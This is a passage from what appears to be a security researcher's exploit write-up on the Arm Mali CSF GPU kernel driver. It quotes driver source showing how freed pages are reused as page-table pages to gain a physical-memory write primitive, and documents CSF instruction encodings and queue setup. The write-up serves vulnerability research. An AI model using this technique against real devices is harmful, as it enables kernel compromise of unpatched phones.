	<span class="n">lockdep_assert_held</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pool</span><span class="o">-&gt;</span><span class="n">pool_lock</span><span class="p">);</span>

	<span class="n">list_splice</span><span class="p">(</span><span class="n">page_list</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pool</span><span class="o">-&gt;</span><span class="n">page_list</span><span class="p">);</span>
	<span class="n">pool</span><span class="o">-&gt;</span><span class="n">cur_size</span> <span class="o">+=</span> <span class="n">nr_pages</span><span class="p">;</span>

	<span class="n">pool_dbg</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="s">"added %zu pages</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">nr_pages</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The pages to be freed are spliced onto the head of the <code class="language-plaintext highlighter-rouge">pool-&gt;page_list</code> using <code class="language-plaintext highlighter-rouge">list_splice</code>
so the next allocation of pages from the <code class="language-plaintext highlighter-rouge">kbase_device</code> pool will start by allocating the freed
pages from <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code>. This will result in the following status of the mem pools for that
particular group.</p>

<p><img src="/assets/mali-csf-exploit/fig4-mem-pool-status.png" alt="Mem pool status for a group: the kbase_context mem_pool holds 16384 freed pages, while the kbase_device mem_pool's list head points to Freed page 1 (from mem_shrink), then Freed page 0 (from mem_shrink), then other freed pages." /></p>

<p>Allocation of a PGD is done through <a href="#alloc_pgd"><code class="language-plaintext highlighter-rouge">kbase_mmu_alloc_pgd</code></a> and it uses
<code class="language-plaintext highlighter-rouge">kbase_mem_pool_alloc</code> to retrieve a page from the <code class="language-plaintext highlighter-rouge">kbase_device</code> mem_pool.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="nf">kbase_mem_pool_alloc</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_pool</span> <span class="o">*</span><span class="n">pool</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">p</span><span class="p">;</span>

	<span class="k">do</span> <span class="p">{</span>
		<span class="n">pool_dbg</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="s">"alloc()</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
		<span class="n">p</span> <span class="o">=</span> <span class="n">kbase_mem_pool_remove</span><span class="p">(</span><span class="n">pool</span><span class="p">);</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">p</span><span class="p">)</span>
			<span class="k">return</span> <span class="n">p</span><span class="p">;</span>

		<span class="n">pool</span> <span class="o">=</span> <span class="n">pool</span><span class="o">-&gt;</span><span class="n">next_pool</span><span class="p">;</span>
	<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">pool</span><span class="p">);</span>

	<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">kbase_mem_pool_remove</code> ultimately uses <code class="language-plaintext highlighter-rouge">kbase_mem_pool_remove_locked</code> to retrieve a page
and simply retrieves the first page in the pool [1] so the page used for the PGD will be the most
recent page inserted into the <code class="language-plaintext highlighter-rouge">kbase_device</code> pool.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="nf">kbase_mem_pool_remove_locked</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_pool</span> <span class="o">*</span><span class="n">pool</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">p</span><span class="p">;</span>

	<span class="n">lockdep_assert_held</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pool</span><span class="o">-&gt;</span><span class="n">pool_lock</span><span class="p">);</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">kbase_mem_pool_is_empty</span><span class="p">(</span><span class="n">pool</span><span class="p">))</span>
		<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="n">p</span> <span class="o">=</span> <span class="n">list_first_entry</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pool</span><span class="o">-&gt;</span><span class="n">page_list</span><span class="p">,</span> <span class="k">struct</span> <span class="n">page</span><span class="p">,</span> <span class="n">lru</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="n">list_del_init</span><span class="p">(</span><span class="o">&amp;</span><span class="n">p</span><span class="o">-&gt;</span><span class="n">lru</span><span class="p">);</span>
	<span class="n">pool</span><span class="o">-&gt;</span><span class="n">cur_size</span><span class="o">--</span><span class="p">;</span>

	<span class="n">pool_dbg</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="s">"removed page</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="k">return</span> <span class="n">p</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>In the actual exploit, the allocation of 513 pages causes a level 2 PGD to be allocated first
followed by a level 3 PGD. This means that the second physical page (freed page 1 above)
freed by <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> will be used for the level 2 PGD while the first physical page (freed
page 0) will be used for the level 3 PGD. Since the alias region’s backing physical page (page 0)
is being reused as a level 3 PGD, we can perform a GPU write operation on the alias region to
overwrite any GPU ATE entry. This essentially gives us an arbitrary write primitive to any
physical address.</p>

<h2 id="writing-to-gpu-memory-using-csf">Writing to GPU memory using CSF</h2>

<h3 id="gpu-instruction-streaming-mechanism">GPU instruction streaming mechanism</h3>

<blockquote>
  <p><strong>Note:</strong> The discussion that follows highlights the current state of research at the end of 2022 - early 2023</p>
</blockquote>

<p>Previous work (CVE-2022-28348/CVE-2022-20186) has shown that writing immediate values to
GPU memory is possible with packing GPU jobs and submitting them using the
<code class="language-plaintext highlighter-rouge">KBASE_IOCTL_JOB_SUBMIT</code> ioctl. This leveraged the <a href="https://gitlab.freedesktop.org/panfrost/pandecode-standalone">pandecode-standalone</a> tool by Alyssa
Rosenzweig. However, such a job submit mechanism does not exist in CSF builds for the Mali
kernel driver and queueing instructions into CSF queue ring buffers is the new way to perform
operations with the GPU. Since Arm was only rolling out CSF on more recent GPUs released
since 2021, these GPUs all use the latest Valhall architecture. Back then, an <a href="https://www.collabora.com/news-and-blog/news-and-events/reverse-engineering-the-mali-g78.html">instruction set reference</a>
released by Collabora for Valhall GPUs existed (it appears the PDF link is no longer freely accessible) so I initially experimented with forming
instructions based on it. However, the GPU complained that the instructions were invalid when using CSF, meaning
that the GPU Valhall architecture probably uses a different instruction
set altogether for CSF GPUs. When looking for an updated instruction set for the newer CSF GPUs, I
discovered this <a href="https://gitlab.com/panfork">panfork repo</a> maintained by Icecream95 which is meant to bring CSF support for
Mali G610/G710 GPUs to the open source Panfrost user space Mali driver. Checking again in 2026, the <code class="language-plaintext highlighter-rouge">panfork</code> repository is now retired and redirects users to use the upstream <a href="https://gitlab.freedesktop.org/mesa/mesa/-/tree/main/src/panfrost">panfrost repo</a> as it now includes support for the drivers that the fork intended to support.</p>

<p>The current upstream <code class="language-plaintext highlighter-rouge">panfrost</code> repository now contains the instruction formats for CSF previously only found in <code class="language-plaintext highlighter-rouge">panfork</code>, and can be referenced for the proper GPU instruction formats. Decoded instruction formats can be found in
<a href="https://gitlab.freedesktop.org/mesa/mesa/-/blob/main/src/panfrost/genxml/v10.xml?ref_type=heads"><code class="language-plaintext highlighter-rouge">mesa/src/panfrost/genxml/v{10, 12, 13, 14}.xml</code></a> (e.g. <code class="language-plaintext highlighter-rouge">CS MOVE48</code>, <code class="language-plaintext highlighter-rouge">CS MOVE32</code>, <code class="language-plaintext highlighter-rouge">CS STORE_MULTIPLE</code>) and some decoding code in
<a href="https://gitlab.freedesktop.org/mesa/mesa/-/blob/main/src/panfrost/genxml/decode_csf.c?ref_type=heads"><code class="language-plaintext highlighter-rouge">mesa/src/panfrost/genxml/decode_csf.c</code></a> which is sufficient for figuring out how to perform a simple write of
an immediate value to GPU memory. Each GPU instruction is 64-bits long and most instructions work
on or with GPU registers, which are 32-bits wide. When experimenting with the instructions, I
found that I could write to registers 0 to 95, but I’m not entirely clear how many registers are
valid for use in this architecture version. We can write a 48-bit immediate value or 32-bit
immediate value into a register with a single instruction, and a 48-bit value is sufficient to
represent a GPU virtual address (i.e. GPU VA) returned by <code class="language-plaintext highlighter-rouge">mmap</code> for GPU VA regions. Physical addresses
should be representable by 32-bit values, depending on the memory layout of the device.</p>

<p>One way of writing an immediate value to a GPU VA can be done by:</p>

<ol>
  <li>Writing the destination address to registers using the 48-bit <code class="language-plaintext highlighter-rouge">MOV</code> instruction</li>
  <li>Writing the immediate value to some other registers using a series of 32-bit <code class="language-plaintext highlighter-rouge">MOV</code>
instructions, depending on the size of the immediate value to write</li>
  <li>Storing the immediate value to the destination address using a <code class="language-plaintext highlighter-rouge">STR</code> instruction</li>
</ol>

<p><code class="language-plaintext highlighter-rouge">48-bit MOV instruction syntax</code>:</p>

<table>
  <thead>
    <tr>
      <th>Bits</th>
      <th>Field</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>56:63</td>
      <td>opcode (0x1)</td>
    </tr>
    <tr>
      <td>48:55</td>
      <td>destination register</td>
    </tr>
    <tr>
      <td>0:47</td>
      <td>48-bit immediate value</td>
    </tr>
  </tbody>
</table>

<blockquote>
  <p><strong>Caveat:</strong> The destination register must be an even numbered register, probably to allow the
hardware to use 64-bit data paths without handling unaligned access.</p>
</blockquote>

<p>When executing this instruction, what actually happens is that the lowest 32 bits of the
immediate value are placed into the destination register, and the remaining 16 bits are placed
starting at bit 0 in the subsequent register. For instance, writing to destination register 2 will write
the bottom 32 bits to register 2 and the higher 16 bits to register 3.</p>

<p><code class="language-plaintext highlighter-rouge">32-bit MOV instruction syntax</code>:</p>

<table>
  <thead>
    <tr>
      <th>Bits</th>
      <th>Field</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>56:63</td>
      <td>opcode (0x2)</td>
    </tr>
    <tr>
      <td>48:55</td>
      <td>destination register</td>
    </tr>
    <tr>
      <td>32:47</td>
      <td>unknown</td>
    </tr>
    <tr>
      <td>0:31</td>
      <td>32-bit immediate value</td>
    </tr>
  </tbody>
</table>

<p>This instruction is largely the same as the 48-bit variant, with the immediate value being written
just to the destination register.</p>

<p><code class="language-plaintext highlighter-rouge">STR instruction syntax</code>:</p>

<table>
  <thead>
    <tr>
      <th>Bits</th>
      <th>Field</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>56:63</td>
      <td>opcode (0x15)</td>
    </tr>
    <tr>
      <td>48:55</td>
      <td>first value register (holds first 32-bits to write)</td>
    </tr>
    <tr>
      <td>40:47</td>
      <td>destination reg (holds address to write to after adding offset)</td>
    </tr>
    <tr>
      <td>32:39</td>
      <td>unknown</td>
    </tr>
    <tr>
      <td>16:31</td>
      <td>value registers mask</td>
    </tr>
    <tr>
      <td>0:15</td>
      <td>offset (must be 4-aligned)</td>
    </tr>
  </tbody>
</table>

<p>The <code class="language-plaintext highlighter-rouge">STR</code> instruction takes the 32-bit values across one or more value registers, starting from the
first value register and the actual registers decided by the value registers mask, and stores them consecutively
starting at <code class="language-plaintext highlighter-rouge">((address stored in {destination register + 1}) &lt;&lt; 32 | address stored in
{destination register}) + offset</code> (destination register + 1 is the next register after the specified destination register). A single <code class="language-plaintext highlighter-rouge">STR</code> instruction allows for the writing of up to sixteen
32-bit registers, specified by the value registers mask. Destination register + 1 should be used
for the upper 32 bits of the address while destination register should hold the lower 32 bits. The value
registers mask works as follows. If we wanted to write the values in register 4, 6 and 8
sequentially to memory, we can specify the first value register as 4 and provide a value registers
mask of 0b10101 (0x15). If we just want to write the values of registers 4 and 5, we will use a
mask of 0b11 (0x3).</p>

<p>For example, to store a 64-bit value to a GPU VA, we can do the following:</p>

<ol>
  <li>Use a 48-bit <code class="language-plaintext highlighter-rouge">MOV</code> instruction to write a GPU VA to register 2</li>
  <li>Use two 32-bit <code class="language-plaintext highlighter-rouge">MOV</code> instructions to write to registers 4 and 5, writing the lower 32-bits of the value to
register 4 and upper 32-bits to register 5</li>
  <li>Use the <code class="language-plaintext highlighter-rouge">STR</code> instruction to store the 64-bit value at the GPU VA. The first value register
will be 4, destination register will be 2, value registers mask will be 3 (0b11) and offset will be 0.
This takes the values at register 4 and 5 and writes them at the GPU VA stored in register 2.</li>
</ol>

<p>This example instruction sequence will be encoded as</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x1 &lt;&lt; 56 | 2 &lt;&lt; 48 | (gpu_va &amp; 0xFFFFFFFFFFFF) &lt;-- 48-bit MOV, stores GPU VA in register 2
0x2 &lt;&lt; 56 | 4 &lt;&lt; 48 | (value &amp; 0xFFFFFFFF) &lt;-- 32-bit MOV, stores lower 32-bits of value to register 4
0x2 &lt;&lt; 56 | 5 &lt;&lt; 48 | (value &gt;&gt; 32) &lt;-- 32-bit MOV, stores upper 32-bits of value to register 5
0x15 &lt;&lt; 56 | 4 &lt;&lt; 48 | 2 &lt;&lt; 40 | 3 &lt;&lt; 16 &lt;-- STR, stores value to GPU VA
</code></pre></div></div>

<h3 id="executing-instructions">Executing instructions</h3>

<p>To actually get the GPU to process instructions in a queue’s ring buffer, each CSF queue
requires a set of three special pages to be mapped that give the user control over GPU execution of
instructions in the ring buffer. The three pages are a hardware doorbell page, an input page and
an output page. A CSF queue has to be bound to a command stream group (CSG) in order to
be scheduled by the CSF scheduler, which schedules one group of command streams at a time.
A command stream is just an abstraction that encapsulates the state of a queue and provides
an interface for the CSF firmware to interact with. A CSF group can be created with the ioctl
<code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_GROUP_CREATE</code> and a queue can be bound to a group using the ioctl
<code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_BIND</code>. In <code class="language-plaintext highlighter-rouge">kbase_csf_queue_bind</code>, the queue is added to the
<code class="language-plaintext highlighter-rouge">bound_queues</code> array of the group and the ioctl returns a <code class="language-plaintext highlighter-rouge">mmap</code> handle for mapping the
hardware doorbell page and input/output pages.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_csf_queue_bind</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="k">union</span> <span class="n">kbase_ioctl_cs_queue_bind</span> <span class="o">*</span><span class="n">bind</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">ret</span> <span class="o">=</span> <span class="n">get_user_pages_mmap_handle</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">queue</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="n">bind</span><span class="o">-&gt;</span><span class="n">out</span><span class="p">.</span><span class="n">mmap_handle</span> <span class="o">=</span> <span class="n">queue</span><span class="o">-&gt;</span><span class="n">handle</span><span class="p">;</span>
	<span class="n">group</span><span class="o">-&gt;</span><span class="n">bound_queues</span><span class="p">[</span><span class="n">bind</span><span class="o">-&gt;</span><span class="n">in</span><span class="p">.</span><span class="n">csi_index</span><span class="p">]</span> <span class="o">=</span> <span class="n">queue</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">group</span> <span class="o">=</span> <span class="n">group</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">csi_index</span> <span class="o">=</span> <span class="n">bind</span><span class="o">-&gt;</span><span class="n">in</span><span class="p">.</span><span class="n">csi_index</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">bind_state</span> <span class="o">=</span> <span class="n">KBASE_CSF_QUEUE_BIND_IN_PROGRESS</span><span class="p">;</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* Reserve a cookie, to be returned as a handle to userspace for creating
 * the CPU mapping of the pair of input/output pages and Hw doorbell page.
 * Will return 0 in case of success otherwise negative on failure.
 */</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">get_user_pages_mmap_handle</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="n">queue</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="cm">/* relocate to correct base */</span>
	<span class="n">cookie</span> <span class="o">=</span> <span class="n">cookie_nr</span> <span class="o">+</span> <span class="n">PFN_DOWN</span><span class="p">(</span><span class="n">BASEP_MEM_CSF_USER_IO_PAGES_HANDLE</span><span class="p">);</span>
	<span class="n">cookie</span> <span class="o">&lt;&lt;=</span> <span class="n">PAGE_SHIFT</span><span class="p">;</span>

	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">handle</span> <span class="o">=</span> <span class="p">(</span><span class="n">u64</span><span class="p">)</span><span class="n">cookie</span><span class="p">;</span>

	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Upon using the returned cookie to mmap the user IO pages, the driver uses
<code class="language-plaintext highlighter-rouge">kbase_csf_cpu_mmap_user_io_pages</code> to perform some allocations and setup of the virtual
memory area (VMA) for the region but does not map the hardware doorbell page as well as
input/output pages to the VMA.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">kbase_csf_cpu_mmap_user_io_pages</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		 <span class="k">struct</span> <span class="n">vm_area_struct</span> <span class="o">*</span><span class="n">vma</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
	<span class="n">err</span> <span class="o">=</span> <span class="n">kbase_csf_alloc_command_stream_user_pages</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">queue</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span>
		<span class="k">goto</span> <span class="n">map_failed</span><span class="p">;</span>
	<span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_flags</span> <span class="o">|=</span> <span class="n">VM_DONTCOPY</span> <span class="o">|</span> <span class="n">VM_DONTDUMP</span> <span class="o">|</span> <span class="n">VM_DONTEXPAND</span> <span class="o">|</span> <span class="n">VM_IO</span><span class="p">;</span>
	<span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_flags</span> <span class="o">|=</span> <span class="n">VM_PFNMAP</span><span class="p">;</span>
	<span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_ops</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">kbase_csf_user_io_pages_vm_ops</span><span class="p">;</span>
	<span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_private_data</span> <span class="o">=</span> <span class="n">queue</span><span class="p">;</span>
 <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">kbase_csf_user_io_pages_vm_ops</code> is assigned as the vm_ops of the user IO pages VMA and
page faults are handled with <code class="language-plaintext highlighter-rouge">kbase_csf_user_io_pages_vm_fault</code> [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">vm_operations_struct</span> <span class="n">kbase_csf_user_io_pages_vm_ops</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">.</span><span class="n">open</span> <span class="o">=</span> <span class="n">kbase_csf_user_io_pages_vm_open</span><span class="p">,</span>
	<span class="p">.</span><span class="n">close</span> <span class="o">=</span> <span class="n">kbase_csf_user_io_pages_vm_close</span><span class="p">,</span>
	<span class="p">.</span><span class="n">fault</span> <span class="o">=</span> <span class="n">kbase_csf_user_io_pages_vm_fault</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="p">};</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">vm_fault_t</span> <span class="nf">kbase_csf_user_io_pages_vm_fault</span><span class="p">(</span><span class="k">struct</span> <span class="n">vm_fault</span> <span class="o">*</span><span class="n">vmf</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">vm_area_struct</span> <span class="o">*</span><span class="n">vma</span> <span class="o">=</span> <span class="n">vmf</span><span class="o">-&gt;</span><span class="n">vma</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="n">queue</span> <span class="o">=</span> <span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_private_data</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">doorbell_cpu_addr</span> <span class="o">=</span> <span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_start</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">vmf</span><span class="o">-&gt;</span><span class="n">address</span> <span class="o">==</span> <span class="n">doorbell_cpu_addr</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">doorbell_page_pfn</span> <span class="o">=</span> <span class="n">get_queue_doorbell_pfn</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span> <span class="n">queue</span><span class="p">);</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="n">mgm_dev</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">.</span><span class="n">mgm_vmf_insert_pfn_prot</span><span class="p">(</span><span class="n">mgm_dev</span><span class="p">,</span>
			<span class="n">KBASE_MEM_GROUP_CSF_IO</span><span class="p">,</span> <span class="n">vma</span><span class="p">,</span> <span class="n">doorbell_cpu_addr</span><span class="p">,</span>
			<span class="n">doorbell_page_pfn</span><span class="p">,</span> <span class="n">doorbell_pgprot</span><span class="p">);</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="cm">/* Map the Input page */</span>
		<span class="n">input_cpu_addr</span> <span class="o">=</span> <span class="n">doorbell_cpu_addr</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
		<span class="n">input_page_pfn</span> <span class="o">=</span> <span class="n">PFN_DOWN</span><span class="p">(</span><span class="n">as_phys_addr_t</span><span class="p">(</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">phys</span><span class="p">[</span><span class="mi">0</span><span class="p">]));</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="n">mgm_dev</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">.</span><span class="n">mgm_vmf_insert_pfn_prot</span><span class="p">(</span><span class="n">mgm_dev</span><span class="p">,</span>
			<span class="n">KBASE_MEM_GROUP_CSF_IO</span><span class="p">,</span> <span class="n">vma</span><span class="p">,</span> <span class="n">input_cpu_addr</span><span class="p">,</span>
			<span class="n">input_page_pfn</span><span class="p">,</span>
			<span class="n">input_page_pgprot</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">!=</span> <span class="n">VM_FAULT_NOPAGE</span><span class="p">)</span>
			<span class="k">goto</span> <span class="n">exit</span><span class="p">;</span>

		<span class="cm">/* Map the Output page */</span>
		<span class="n">output_cpu_addr</span> <span class="o">=</span> <span class="n">input_cpu_addr</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
		<span class="n">output_page_pfn</span> <span class="o">=</span> <span class="n">PFN_DOWN</span><span class="p">(</span><span class="n">as_phys_addr_t</span><span class="p">(</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">phys</span><span class="p">[</span><span class="mi">1</span><span class="p">]));</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="n">mgm_dev</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">.</span><span class="n">mgm_vmf_insert_pfn_prot</span><span class="p">(</span><span class="n">mgm_dev</span><span class="p">,</span>
			<span class="n">KBASE_MEM_GROUP_CSF_IO</span><span class="p">,</span> <span class="n">vma</span><span class="p">,</span> <span class="n">output_cpu_addr</span><span class="p">,</span>
			<span class="n">output_page_pfn</span><span class="p">,</span> <span class="n">output_page_pgprot</span><span class="p">);</span>
	<span class="p">}</span>
      <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">get_queue_doorbell_pfn</code> only returns the real hardware doorbell page if the command stream
associated with the queue has already been scheduled. When scheduling a command stream,
the scheduler invokes <code class="language-plaintext highlighter-rouge">program_cs</code> which programs the associated queue’s state and data into
a shared page with the CSF firmware, assigns a user doorbell to the queue, and rings the kernel
doorbell for the command stream to notify the GPU of a new stream ready for execution.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">program_cs</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="n">queue</span><span class="p">,</span> <span class="n">bool</span> <span class="n">ring_csg_doorbell</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">assign_user_doorbell_to_queue</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span> <span class="n">queue</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">doorbell_nr</span> <span class="o">==</span> <span class="n">KBASEP_USER_DB_NR_INVALID</span><span class="p">)</span>
		<span class="k">return</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">stream</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">ginfo</span><span class="o">-&gt;</span><span class="n">streams</span><span class="p">[</span><span class="n">csi_index</span><span class="p">];</span>

	<span class="n">kbase_csf_firmware_cs_input</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">CS_BASE_LO</span><span class="p">,</span>
			    <span class="n">queue</span><span class="o">-&gt;</span><span class="n">base_addr</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">);</span>
	<span class="n">kbase_csf_firmware_cs_input</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">CS_BASE_HI</span><span class="p">,</span>
			    <span class="n">queue</span><span class="o">-&gt;</span><span class="n">base_addr</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">);</span>
	<span class="n">kbase_csf_firmware_cs_input</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">CS_SIZE</span><span class="p">,</span>
			    <span class="n">queue</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">);</span>

	<span class="n">user_input</span> <span class="o">=</span> <span class="p">(</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">&lt;&lt;</span> <span class="n">PAGE_SHIFT</span><span class="p">);</span>
	<span class="n">kbase_csf_firmware_cs_input</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">CS_USER_INPUT_LO</span><span class="p">,</span>
			    <span class="n">user_input</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">);</span>
	<span class="n">kbase_csf_firmware_cs_input</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">CS_USER_INPUT_HI</span><span class="p">,</span>
			    <span class="n">user_input</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">);</span>

	<span class="p">...</span>
	<span class="n">kbase_csf_ring_cs_kernel_doorbell</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span> <span class="n">csi_index</span><span class="p">,</span>
                                <span class="n">group</span><span class="o">-&gt;</span><span class="n">csg_nr</span><span class="p">,</span>
			  <span class="n">ring_csg_doorbell</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">assign_user_doorbell_to_queue</code> checks that the queue has an invalid doorbell number
<code class="language-plaintext highlighter-rouge">KBASEP_USER_DB_NR_INVALID</code> and proceeds to assign a doorbell number and zaps the
mapped doorbell page in the user IO pages VMA.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">assign_user_doorbell_to_queue</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="k">const</span> <span class="n">queue</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">((</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">bind_state</span> <span class="o">==</span> <span class="n">KBASE_CSF_QUEUE_BOUND</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
	    <span class="p">(</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">doorbell_nr</span> <span class="o">==</span> <span class="n">KBASEP_USER_DB_NR_INVALID</span><span class="p">))</span> <span class="p">{</span>
		<span class="n">WARN_ON</span><span class="p">(</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">group</span><span class="o">-&gt;</span><span class="n">doorbell_nr</span> <span class="o">==</span> <span class="n">KBASEP_USER_DB_NR_INVALID</span><span class="p">);</span>
